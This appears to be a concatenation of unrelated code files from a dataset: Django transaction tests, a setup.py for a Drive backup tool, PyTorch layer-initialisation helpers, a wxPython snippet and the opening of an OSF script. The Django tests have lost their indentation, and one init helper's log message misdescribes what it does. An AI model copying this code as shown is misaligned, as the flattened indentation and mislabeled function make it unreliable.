Reporter.objects.create(first_name="Tintin")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: <NAME>>', '<Reporter: Tintin>'])
def test_nested_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_nested_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic():
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: <NAME>>', '<Reporter: Tintin>'])
def test_merged_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
# Writes in the outer block are rolled back too.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_commit_commit(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with atomic:
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: <NAME>>', '<Reporter: Tintin>'])
def test_reuse_commit_rollback(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_reuse_rollback_commit(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with atomic:
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_rollback_rollback(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_force_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
# atomic block shouldn't rollback, but force it.
self.assertFalse(transaction.get_rollback())
transaction.set_rollback(True)
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_prevent_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
sid = transaction.savepoint()
# trigger a database error inside an inner atomic without savepoint
with self.assertRaises(DatabaseError):
with transaction.atomic(savepoint=False):
connection.cursor().execute(
"SELECT no_such_col FROM transactions_reporter")
# prevent atomic from rolling back since we're recovering manually
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
transaction.savepoint_rollback(sid)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
class AtomicInsideTransactionTests(AtomicTests):
"""All basic tests for atomic should also pass within an existing transaction."""
def setUp(self):
self.atomic = transaction.atomic()
self.atomic.__enter__()
def tearDown(self):
self.atomic.__exit__(*sys.exc_info())
@skipIf(connection.features.autocommits_when_autocommit_is_off,
"This test requires a non-autocommit mode that doesn't autocommit.")
class AtomicWithoutAutocommitTests(AtomicTests):
"""All basic tests for atomic should also pass when autocommit is turned off."""
def setUp(self):
transaction.set_autocommit(False)
def tearDown(self):
        # The tests access the database after exercising 'atomic', initiating
        # a transaction; a rollback is required before restoring autocommit.
transaction.rollback()
transaction.set_autocommit(True)
@skipIf(connection.features.autocommits_when_autocommit_is_off,
"This test requires a non-autocommit mode that doesn't autocommit.")
class AtomicInsideLegacyTransactionManagementTests(AtomicTests):
def setUp(self):
transaction.enter_transaction_management()
def tearDown(self):
# The tests access the database after exercising 'atomic', making the
# connection dirty; a rollback is required to make it clean.
transaction.rollback()
transaction.leave_transaction_management()
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicMergeTests(TransactionTestCase):
"""Test merging transactions with savepoint=False."""
available_apps = ['transactions']
def test_merged_outer_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Tournesol")
raise Exception("Oops, that's his last name")
                # The third insert couldn't be rolled back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
            # The second insert couldn't be rolled back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The first block has a savepoint and must roll back.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_inner_savepoint_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Tournesol")
raise Exception("Oops, that's his last name")
                # The third insert couldn't be rolled back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The second block has a savepoint and must roll back.
self.assertEqual(Reporter.objects.count(), 1)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicErrorsTests(TransactionTestCase):
available_apps = ['transactions']
def test_atomic_prevents_setting_autocommit(self):
autocommit = transaction.get_autocommit()
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.set_autocommit(not autocommit)
# Make sure autocommit wasn't changed.
self.assertEqual(connection.autocommit, autocommit)
def test_atomic_prevents_calling_transaction_methods(self):
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.commit()
with self.assertRaises(transaction.TransactionManagementError):
transaction.rollback()
def test_atomic_prevents_calling_transaction_management_methods(self):
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.enter_transaction_management()
with self.assertRaises(transaction.TransactionManagementError):
transaction.leave_transaction_management()
def test_atomic_prevents_queries_in_broken_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# The transaction is marked as needing rollback.
with self.assertRaises(transaction.TransactionManagementError):
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Haddock")
@skipIfDBFeature('atomic_transactions')
def test_atomic_allows_queries_after_fixing_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# Mark the transaction as no longer needing rollback.
transaction.set_rollback(False)
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Calculus")
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_atomic_prevents_queries_in_broken_transaction_after_client_close(self):
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
connection.close()
# The connection is closed and the transaction is marked as
# needing rollback. This will raise an InterfaceError on databases
# that refuse to create cursors on closed connections (PostgreSQL)
# and a TransactionManagementError on other databases.
with self.assertRaises(Error):
Reporter.objects.create(first_name="Cuthbert", last_name="Calculus")
        # The connection is usable again.
self.assertEqual(Reporter.objects.count(), 0)
@skipUnless(connection.vendor == 'mysql', "MySQL-specific behaviors")
class AtomicMySQLTests(TransactionTestCase):
available_apps = ['transactions']
@skipIf(threading is None, "Test requires threading")
def test_implicit_savepoint_rollback(self):
"""MySQL implicitly rolls back savepoints when it deadlocks (#22291)."""
other_thread_ready = threading.Event()
def other_thread():
try:
with transaction.atomic():
Reporter.objects.create(id=1, first_name="Tintin")
other_thread_ready.set()
# We cannot synchronize the two threads with an event here
# because the main thread locks. Sleep for a little while.
time.sleep(1)
# 2) ... and this line deadlocks. (see below for 1)
Reporter.objects.exclude(id=1).update(id=2)
finally:
# This is the thread-local connection, not the main connection.
connection.close()
other_thread = threading.Thread(target=other_thread)
other_thread.start()
other_thread_ready.wait()
with six.assertRaisesRegex(self, OperationalError, 'Deadlock found'):
# Double atomic to enter a transaction and create a savepoint.
with transaction.atomic():
with transaction.atomic():
# 1) This line locks... (see above for 2)
Reporter.objects.create(id=1, first_name="Tintin")
other_thread.join()
class AtomicMiscTests(TransactionTestCase):
available_apps = []
def test_wrap_callable_instance(self):
# Regression test for #20028
class Callable(object):
def __call__(self):
pass
# Must not raise an exception
transaction.atomic(Callable())
class TransactionTests(IgnorePendingDeprecationWarningsMixin, TransactionTestCase):
available_apps = ['transactions']
def create_a_reporter_then_fail(self, first, last):
a = Reporter(first_name=first, last_name=last)
a.save()
raise Exception("I meant to do that")
def remove_a_reporter(self, first_name):
        r = Reporter.objects.get(first_name=first_name)
r.delete()
def manually_managed(self):
r = Reporter(first_name="Dirk", last_name="Gently")
r.save()
transaction.commit()
def manually_managed_mistake(self):
r = Reporter(first_name="Edward", last_name="Woodward")
r.save()
# Oops, I forgot to commit/rollback!
@skipUnlessDBFeature('supports_transactions')
def test_autocommit(self):
"""
The default behavior is to autocommit after each save() action.
"""
self.assertRaises(Exception,
self.create_a_reporter_then_fail,
"Alice", "Smith"
)
# The object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_decorator(self):
"""
The autocommit decorator works exactly the same as the default behavior.
"""
autocomitted_create_then_fail = transaction.autocommit(
self.create_a_reporter_then_fail
)
self.assertRaises(Exception,
autocomitted_create_then_fail,
"Alice", "Smith"
)
# Again, the object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_decorator_with_using(self):
"""
The autocommit decorator also works with a using argument.
"""
autocomitted_create_then_fail = transaction.autocommit(using='default')(
self.create_a_reporter_then_fail
)
self.assertRaises(Exception,
autocomitted_create_then_fail,
"Alice", "Smith"
)
# Again, the object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success(self):
"""
With the commit_on_success decorator, the transaction is only committed
if the function doesn't throw an exception.
"""
committed_on_success = transaction.commit_on_success(
self.create_a_reporter_then_fail)
self.assertRaises(Exception, committed_on_success, "Dirk", "Gently")
# This time the object never got saved
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_with_using(self):
"""
The commit_on_success decorator also works with a using argument.
"""
using_committed_on_success = transaction.commit_on_success(using='default')(
self.create_a_reporter_then_fail
)
self.assertRaises(Exception,
using_committed_on_success,
"Dirk", "Gently"
)
# This time the object never got saved
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_succeed(self):
"""
If there aren't any exceptions, the data will get saved.
"""
Reporter.objects.create(first_name="Alice", last_name="Smith")
remove_comitted_on_success = transaction.commit_on_success(
self.remove_a_reporter
)
remove_comitted_on_success("Alice")
self.assertEqual(list(Reporter.objects.all()), [])
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_exit(self):
@transaction.autocommit()
def gen_reporter():
@transaction.commit_on_success
def create_reporter():
Reporter.objects.create(first_name="Bobby", last_name="Tables")
create_reporter()
# Much more formal
r = Reporter.objects.get()
r.first_name = "Robert"
r.save()
gen_reporter()
r = Reporter.objects.get()
self.assertEqual(r.first_name, "Robert")
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed(self):
"""
You can manually manage transactions if you really want to, but you
have to remember to commit/rollback.
"""
manually_managed = transaction.commit_manually(self.manually_managed)
manually_managed()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_mistake(self):
"""
If you forget, you'll get bad errors.
"""
manually_managed_mistake = transaction.commit_manually(
self.manually_managed_mistake
)
self.assertRaises(transaction.TransactionManagementError,
manually_managed_mistake)
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_with_using(self):
"""
The commit_manually function also works with a using argument.
"""
using_manually_managed_mistake = transaction.commit_manually(using='default')(
self.manually_managed_mistake
)
self.assertRaises(transaction.TransactionManagementError,
using_manually_managed_mistake
)
class TransactionRollbackTests(IgnorePendingDeprecationWarningsMixin, TransactionTestCase):
available_apps = ['transactions']
def execute_bad_sql(self):
cursor = connection.cursor()
cursor.execute("INSERT INTO transactions_reporter (first_name, last_name) VALUES ('Douglas', 'Adams');")
@skipUnlessDBFeature('requires_rollback_on_dirty_transaction')
def test_bad_sql(self):
"""
Regression for #11900: If a function wrapped by commit_on_success
writes a transaction that can't be committed, that transaction should
be rolled back. The bug is only visible using the psycopg2 backend,
though the fix is generally a good idea.
"""
execute_bad_sql = transaction.commit_on_success(self.execute_bad_sql)
self.assertRaises(IntegrityError, execute_bad_sql)
transaction.rollback()
class TransactionContextManagerTests(IgnorePendingDeprecationWarningsMixin, TransactionTestCase):
available_apps = ['transactions']
def create_reporter_and_fail(self):
Reporter.objects.create(first_name="Bob", last_name="Holtzman")
raise Exception
@skipUnlessDBFeature('supports_transactions')
def test_autocommit(self):
"""
The default behavior is to autocommit after each save() action.
"""
with self.assertRaises(Exception):
self.create_reporter_and_fail()
# The object created before the exception still exists
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_context_manager(self):
"""
The autocommit context manager works exactly the same as the default
behavior.
"""
with self.assertRaises(Exception):
with transaction.autocommit():
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_autocommit_context_manager_with_using(self):
"""
The autocommit context manager also works with a using argument.
"""
with self.assertRaises(Exception):
with transaction.autocommit(using="default"):
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success(self):
"""
With the commit_on_success context manager, the transaction is only
committed if the block doesn't throw an exception.
"""
with self.assertRaises(Exception):
with transaction.commit_on_success():
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_with_using(self):
"""
The commit_on_success context manager also works with a using argument.
"""
with self.assertRaises(Exception):
with transaction.commit_on_success(using="default"):
self.create_reporter_and_fail()
self.assertEqual(Reporter.objects.count(), 0)
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_succeed(self):
"""
If there aren't any exceptions, the data will get saved.
"""
Reporter.objects.create(first_name="Alice", last_name="Smith")
with transaction.commit_on_success():
Reporter.objects.filter(first_name="Alice").delete()
self.assertQuerysetEqual(Reporter.objects.all(), [])
@skipUnlessDBFeature('supports_transactions')
def test_commit_on_success_exit(self):
with transaction.autocommit():
with transaction.commit_on_success():
Reporter.objects.create(first_name="Bobby", last_name="Tables")
# Much more formal
r = Reporter.objects.get()
r.first_name = "Robert"
r.save()
r = Reporter.objects.get()
self.assertEqual(r.first_name, "Robert")
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed(self):
"""
You can manually manage transactions if you really want to, but you
have to remember to commit/rollback.
"""
with transaction.commit_manually():
Reporter.objects.create(first_name="Libby", last_name="Holtzman")
transaction.commit()
self.assertEqual(Reporter.objects.count(), 1)
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_mistake(self):
"""
If you forget, you'll get bad errors.
"""
with self.assertRaises(transaction.TransactionManagementError):
with transaction.commit_manually():
Reporter.objects.create(first_name="Scott", last_name="Browning")
@skipUnlessDBFeature('supports_transactions')
def test_manually_managed_with_using(self):
"""
The commit_manually function also works with a using argument.
"""
with self.assertRaises(transaction.TransactionManagementError):
with transaction.commit_manually(using="default"):
Reporter.objects.create(first_name="Walter", last_name="Cronkite")
@skipUnlessDBFeature('requires_rollback_on_dirty_transaction')
def test_bad_sql(self):
"""
Regression for #11900: If a block wrapped by commit_on_success
writes a transaction that can't be committed, that transaction should
be rolled back. The bug is only visible using the psycopg2 backend,
though the fix is generally a good idea.
"""
with self.assertRaises(IntegrityError):
with transaction.commit_on_success():
cursor = connection.cursor()
cursor.execute("INSERT INTO transactions_reporter (first_name, last_name) VALUES ('Douglas', 'Adams');")
transaction.rollback()
|
68249
|
try:
from setuptools import setup, find_packages
except ImportError:
    print('Please download and install setuptools (http://pypi.python.org/pypi/setuptools)')
exit(1)
setup(
name = "Brive",
version = "0.4.0",
packages = find_packages(),
author = "<NAME>",
author_email = "<EMAIL>",
description = "Brive, the Google Apps Domains' Drive Backup application",
license = "UNLICENSED (cf http://unlicense.org/)",
keywords = "google drive backup domain",
url = "https://github.com/x8wk/Brive",
install_requires = [
'Brive==0.3.11',
'cffi==1.2.1',
'cryptography==1.0.1',
'enum34==1.0.4',
'feedparser==5.2.1',
'google-api-python-client==1.4.2',
'httplib2==0.9.1',
'idna==2.0',
'ipaddress==1.0.14',
'oauth2client==1.5.1',
'pyasn1==0.1.8',
'pyasn1-modules==0.0.7',
'pycparser==2.14',
'pyOpenSSL==0.15.1',
'python-dateutil==2.4.2',
'PyYAML==3.11',
'rsa==3.2',
'simplejson==3.8.0',
'six==1.9.0',
'streaming-httplib2==0.7.6',
'uritemplate==0.6',
'wheel==0.26.0'
],
dependency_links = [
"http://pyyaml.org/download/pyyaml/PyYAML-3.11.tar.gz"
]
)
# for some reason, the developer of streaming_httplib2 didn't include the certificates
# of signing authorities for SSL, so here we copy the certs from httplib2
# ugly, but eh...
import os, sys, httplib2, streaming_httplib2, shutil
httplib2_root = os.path.dirname(httplib2.__file__)
streaming_httplib2_root = os.path.dirname(streaming_httplib2.__file__)
cacerts_file_path = os.path.join(httplib2_root, 'cacerts.txt')
shutil.copy(cacerts_file_path, streaming_httplib2_root)
|
68261
|
import torch.nn as nn
import math
import torch
def init_model(model, **kwargs):
conv_type = kwargs.get("conv_type", None)
if conv_type == "def":
conv_type = None
bias_type = kwargs.get("bias_type", None)
if bias_type == "def":
bias_type = None
mode = kwargs.get("mode", None)
nonlinearity = kwargs.get("nonlinearity", None)
bn_init = kwargs.get("bn_init", None)
if bn_init == "def":
bn_init = None
init_linear = kwargs.get("init_linear", False)
logger = kwargs.get("logger", None)
assert (logger is not None)
assert (conv_type in {"he", "xavier", None})
assert (mode in {"fan_out", "fan_in", None})
assert (nonlinearity in {"relu", None})
assert (bn_init in {"01", "11", "uniformweight", None})
if conv_type is not None:
if conv_type == "he":
init_conv_he(model, mode, nonlinearity, logger)
if conv_type == "xavier":
init_conv_xavier(model, mode, nonlinearity, logger)
init_lin_xavier(model, logger)
if bias_type is not None:
if bias_type == "xavier":
init_bias_xavier(model, mode, nonlinearity, logger)
init_bias_lin_xavier(model, logger)
if str(bias_type) == "0":
init_bias_zero(model, mode, nonlinearity, logger)
init_bias_lin_zero(model, logger)
if bn_init is not None:
if bn_init == "01":
init_bn_01(model, logger=logger)
elif bn_init == "11":
init_bn_11(model, logger=logger)
elif bn_init == "uniformweight":
init_bn_uniformweight(model, logger=logger)
if init_linear:
init_lin(model, logger)
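# Minimal usage sketch (the model and logger names below are hypothetical, not
# part of this module):
#
#   import logging
#   log = logging.getLogger(__name__)
#   net = SomeConvNet()  # any nn.Module containing Conv2d/BatchNorm2d/Linear layers
#   init_model(net, conv_type="he", bias_type="0", mode="fan_out",
#              nonlinearity="relu", bn_init="01", logger=log)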
def init_conv_xavier(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
layers_initialized += 1
torch.nn.init.xavier_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.normal_(0, math.sqrt(2)/math.sqrt(1+9*m.bias.data.shape[0]))
logger.info("Initialized " + str(layers_initialized) + " Conv2d layers using nn.init.xavier_normal_")
def init_bias_xavier(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
if m.bias is not None:
layers_initialized += 1
m.bias.data.normal_(0, math.sqrt(2)/math.sqrt(1+9*m.bias.data.shape[0]))
logger.info("Initialized " + str(layers_initialized) + \
" bias conv2d layers using nn.init.xavier.noraml_")
def init_lin_xavier(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
layers_initialized += 1
torch.nn.init.xavier_normal_(m.weight.data)
logger.info("Initialized " + str(layers_initialized) + " linear layers using xavier")
def init_bias_lin_xavier(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
if m.bias is not None:
layers_initialized += 1
m.bias.data.normal_(0, math.sqrt(2)/math.sqrt(1+m.bias.data.shape[0]))
logger.info("Initialized " + str(layers_initialized) + " bias linear layers using xavier")
def init_bias_lin_zero(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
if m.bias is not None:
layers_initialized += 1
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + " bias linear layers using 0")
def init_bias_zero(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
if m.bias is not None:
layers_initialized += 1
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + \
" bias conv2d layers using nn.init.zero")
def init_conv_he(model, mode='fan_out', nonlinearity='relu', logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Conv2d):
layers_initialized += 1
            nn.init.kaiming_normal_(m.weight.data, a=a, mode=mode)
logger.info("Initialized " + str(layers_initialized) + \
" conv2d layers using nn.init.kaiming_normal_")
def init_lin(model, logger=None):
layers_initialized = 0
a = 0
for m in model.modules():
if isinstance(m, nn.Linear):
layers_initialized += 1
stdv = 1. / math.sqrt(m.weight.data.size(1))
std_cur = stdv
m.weight.data.fill_(std_cur)
m.bias.data.fill_(std_cur)
logger.info("Initialized " + str(layers_initialized) + " linear layers using PyTorch default")
def init_bn_01(model, logger=None):
layers_initialized = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
layers_initialized += 1
m.weight.data.fill_(1)
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + " BN layers using weight=1 and bias=0")
def init_bn_11(model, logger=None):
layers_initialized = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
layers_initialized += 1
m.weight.data.fill_(0.015)
m.bias.data.fill_(0.015)
logger.info("Initialized " + str(layers_initialized) + " BN layers using weight=0.015 and bias=0.015")
def init_bn_uniformweight(model, logger=None):
layers_initialized = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
layers_initialized += 1
m.weight.data.uniform_()
m.bias.data.zero_()
logger.info("Initialized " + str(layers_initialized) + " BN layers using weight=U(0,1) and bias=0")
###############
def _calculate_correct_fan(tensor, mode):
mode = mode.lower()
valid_modes = ['fan_in', 'fan_out']
if mode not in valid_modes:
raise ValueError("Mode {} not supported, please use one of {}".format(mode, valid_modes))
fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)
return fan_in if mode == 'fan_in' else fan_out
def _calculate_fan_in_and_fan_out(tensor):
dimensions = tensor.ndimension()
if dimensions < 2:
raise ValueError("Fan in and fan out can not be computed for tensor with less than 2 dimensions")
if dimensions == 2: # Linear
fan_in = tensor.size(1)
fan_out = tensor.size(0)
else:
num_input_fmaps = tensor.size(1)
num_output_fmaps = tensor.size(0)
receptive_field_size = 1
if tensor.dim() > 2:
receptive_field_size = tensor[0][0].numel()
fan_in = num_input_fmaps * receptive_field_size
fan_out = num_output_fmaps * receptive_field_size
return fan_in, fan_out
def calculate_gain(nonlinearity, param=None):
r"""Return the recommended gain value for the given nonlinearity function.
The values are as follows:
================= ====================================================
nonlinearity gain
================= ====================================================
Linear / Identity :math:`1`
Conv{1,2,3}D :math:`1`
Sigmoid :math:`1`
Tanh :math:`\frac{5}{3}`
ReLU :math:`\sqrt{2}`
Leaky Relu :math:`\sqrt{\frac{2}{1 + \text{negative_slope}^2}}`
================= ====================================================
Args:
nonlinearity: the non-linear function (`nn.functional` name)
param: optional parameter for the non-linear function
Examples:
>>> gain = nn.init.calculate_gain('leaky_relu')
"""
linear_fns = ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d', 'conv_transpose2d', 'conv_transpose3d']
if nonlinearity in linear_fns or nonlinearity == 'sigmoid':
return 1
elif nonlinearity == 'tanh':
return 5.0 / 3
elif nonlinearity == 'relu':
return math.sqrt(2.0)
elif nonlinearity == 'leaky_relu':
if param is None:
negative_slope = 0.01
elif not isinstance(param, bool) and isinstance(param, int) or isinstance(param, float):
# True/False are instances of int, hence check above
negative_slope = param
else:
raise ValueError("negative_slope {} not a valid number".format(param))
return math.sqrt(2.0 / (1 + negative_slope ** 2))
else:
raise ValueError("Unsupported nonlinearity {}".format(nonlinearity))
def kaiming_normal_std_(tensor, a=0, mode='fan_in', nonlinearity='leaky_relu'):
r"""Fills the input `Tensor` with values according to the method
described in "Delving deep into rectifiers: Surpassing human-level
performance on ImageNet classification" - <NAME>. et al. (2015), using a
normal distribution. The resulting tensor will have values sampled from
:math:`\mathcal{N}(0, \text{std})` where
.. math::
\text{std} = \sqrt{\frac{2}{(1 + a^2) \times \text{fan_in}}}
Also known as He initialization.
Args:
tensor: an n-dimensional `torch.Tensor`
a: the negative slope of the rectifier used after this layer (0 for ReLU
by default)
mode: either 'fan_in' (default) or 'fan_out'. Choosing `fan_in`
preserves the magnitude of the variance of the weights in the
forward pass. Choosing `fan_out` preserves the magnitudes in the
backwards pass.
nonlinearity: the non-linear function (`nn.functional` name),
recommended to use only with 'relu' or 'leaky_relu' (default).
Examples:
>>> w = torch.empty(3, 5)
        >>> std = kaiming_normal_std_(w, mode='fan_out', nonlinearity='relu')
"""
fan = _calculate_correct_fan(tensor, mode)
gain = calculate_gain(nonlinearity, a)
std = gain / math.sqrt(fan)
return std
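# A minimal, self-contained sketch (shapes are illustrative only): compute the
# He/Kaiming std with kaiming_normal_std_ and apply it to a weight manually.
if __name__ == "__main__":
    w = torch.empty(64, 3, 7, 7)
    std = kaiming_normal_std_(w, a=0, mode="fan_out", nonlinearity="relu")
    with torch.no_grad():
        w.normal_(0, std)
    print("fan_out std: %.6f" % std)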
|
68276
|
import wx.lib.agw.floatspin as floatspin
from .wxControl import *
class 图片操作(wx.Image, 公用方法):
pass
def 设置宽度高度(self, width, height, quality=0):
return 图片操作(self.Scale(width, height, quality))
def 取位图(self, depth=-1):
return self.ConvertToBitmap(depth)
|
68321
|
import os
import json
import logging
import sys
from django.db import transaction
from django.apps import apps
from scripts import utils as script_utils
from scripts.populate_preprint_providers import update_or_create
from website.app import init_app
from website import settings
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
# OSF preprint provider used for initial subject creation
OSF_PROVIDER_DATA = {
'_id': 'osf',
'name': 'Open Science Framework',
'domain': settings.DOMAIN,
'domain_redirect_enabled': False,
'default_license': 'CC0 1.0 Universal',
'licenses_acceptable': ['CC0 1.0 Universal', 'CC-By Attribution 4.0 International', 'No license'],
}
def update_taxonomies(filename):
Subject = apps.get_model('osf.Subject')
PreprintProvider = apps.get_model('osf.PreprintProvider')
try:
